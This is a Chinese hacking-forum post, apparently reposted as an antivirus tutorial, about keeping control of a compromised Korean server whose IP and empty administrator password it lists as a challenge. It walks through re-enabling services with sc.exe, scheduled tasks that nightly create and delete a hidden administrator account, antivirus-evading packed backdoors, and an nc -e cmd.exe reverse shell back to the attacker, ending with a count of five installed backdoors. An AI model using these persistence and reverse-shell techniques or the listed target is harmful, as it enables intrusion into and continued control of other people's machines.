争怎路由网/杀毒教程/内容

你能拿到这台机的一个文件吗

杀毒教程2024-02-21 阅读
网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。

首先申明,我很菜的,绝对是一个菜鸟。今天忽然很有兴趣想跟我一样菜的菜鸟来玩这个游戏。当做一个小测试吧。所以如果你是高手的话就不用往下看了。

今天花了点时间对台肉机作了点小小的安全配置。
韩国机。没做IP策略。没做端口过滤。端口开放:21,25,80,135,139,445,3306,3389
211.42.93.200
administrator 密码为空。(绝对是管理员帐号)

任务是:拿到c:\winnt\system.txt,读出里面的内容。
说明:至少有3种以上的方法可进入主机


答案是用sc.exe

SORRY,由于我的疏忽(我只检查了2次),造成无法IPC连接。因为是
弱口令,所以之前已经有同行进入肉机并且做了个BAT文件来删除IPC$
.而我也只是断了他留下了的后门(当时并没有发现这个BAT文件,真
失败),所以后来我看到有人说无法IPC连接,我才上去net share ipc$

这个“小游戏”是我又看了沉睡不醒的<<构建一只安全的肉鸡>>一时兴
起做的,目的是想看大家的思路,下面是我的具体做法和对<<构建一只安全的肉鸡>>
的一点补充:
1,查看补丁情况
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\HotFix
发现已打了SP3补丁,省事,倒也省了我不少工夫。
2,修改注册表,禁止空连接,删除admin$,C$,D$等等。
关掉Admin$ 
服务器: 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 
AutoShareServer = DWORD:00000000 
工作站: 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters 
AutoShareWks = DWORD:00000000 
禁止空会话: 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA 
RestrictAnonymous = DWORD:00000001 
或者“控制面板”-“本地(域)安全策略”-“安全选项”里...... 
立刻从新启动lanmanserver服务,使其生效。
注意:现在并没有删除IPC$连接。
3,看一下有没有可疑帐号,如肉机是server以下版本,用CCA.EXE查看
是否有克隆帐号,如是AD-server就看一下管理员有没有可疑帐号,有就
删除它吧。
4,我在肉机上装了RADMIN,winshell(脱壳并加壳,目的是防止被杀毒
软件杀掉),WinEggDrop Shell。为了防止其他人进入肉机,用WinEggDrop Shell
的fport功能,打开“服务”窗口看一下没有可疑服务,进程,有的话就停服务
杀进程(pskill),删除相关的程序。
5,虽然有开80端口,但只是默认装了IIS,肉机本身并没有什么网站,而且
而且也装了SP3,不会有什么漏洞。更详细的资料请看<<构建一只安全的肉鸡>>
6,服务”-“snmp service”-“属性页”-“安全”那个“接受团体名称”也就是
“public”,它就是snmp访问口令。把它改成一个安全的口令。小心!一些暴力破解。
这个漏洞,危害虽然没有那么直接,但还是有的,暴露系统的类型和具体的版本,
获取帐号列表,运行服务信息.....。 
7,开了3306端口,用的mysql,没有什么漏洞。如是MSSQL,就要小心了,
看看补丁情况,没补的话就补上吧。
8,虽然现在除了IPC$,没有什么C盘D盘的共享了,但已防万一,把at.exe
改一下名。禁用并停止WMI服务,禁用并停止再删除telnet服务(从
注册表中删除)
9,停止远程注册表服务(Remote Registry Service),这个也很危险喔)
10,虽然administrator是管理员帐号,但是我禁止了它登陆终端服务器)。

好了,现在用终端连接服务器,opentelnet RTCS.vbe,psexec也连不上了。
因为psexec默认用的c:\winnt\system32\cmd.exe,但删除C$,所以使用
psexec显示拒绝访问。我试过建个共享文件夹,copy个cmd.exe到这个文件
共享文件夹,然后再用psexec也不行。那现在只能用的是ipc$,也到了SC.EXE
出场了,一个常被人忘记的程序。我们只是禁用并停止了WMI服务,但
我们仍然可以用打开WMI服务,而不用理会这个服务是否禁用,是否需要
手动开启。而且就算这个服务被删除了,我们也可以重新创建它。
sc \\ip config WinMgmt start= auto
看到命令成功的提示了吗?那现在就可以用eva的那个RTCS.vbe来telnet了,
同样,可以利用还有telnet服务。

如果你用终端连接服务器登陆的话会发现administrator没有登陆会话权,
其实只是“计算机管理”-帐号-“属性”-“禁止登陆终端服务器”而已。
用sc开启远程注册表服务,然后“连接网络注册表”修改注册表使其重新
启动后可以登陆。

其实我们大可做ipsec来过滤掉135,135,445端口,但这样做改动太大,怕管理员
发现,而且肉机如果是日文,韩文,那怎么办?如果我们做了个BAT文件来删除
IPC$,并且每次随肉机启动而运行。这个连sc.exe也没用了。我们还有
下面的做法,利用计划任务,这个方法是星云大哥以前提过的
1).在晚上10点运行这个3个命令
net share ipc$
net user user password /add
net localgroup administrators user /add
2).在早上6点运行这个3个命令
net share ipc$ /del
net localgroup administrators user /del
net user user /del
用命令行来做吧,够隐蔽
其实我们还可以加个nc 你的本机IP 54 >> nc -e cmd.exe上去上面的程序行,
(当然这个nc.exe是传上去的,不过小心被杀掉,一般杀素软件都认为nc.exe是病毒)
然后在本机用nc -l -p 54
这时nc就会反向发一个shell给你,防火墙就会为你转发数据。

数一数,装了5个后门
1,Radmin
2,WinEggDrop Shell
3,winshell
4,计划任务来建用户,也算后门吧
5,nc.exe开反向连接后门

本文写得很乱,也没有一点技术的细节,因为我太菜,上面只是我的一点体会
让我们一起进步吧。。。

网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。



……

相关阅读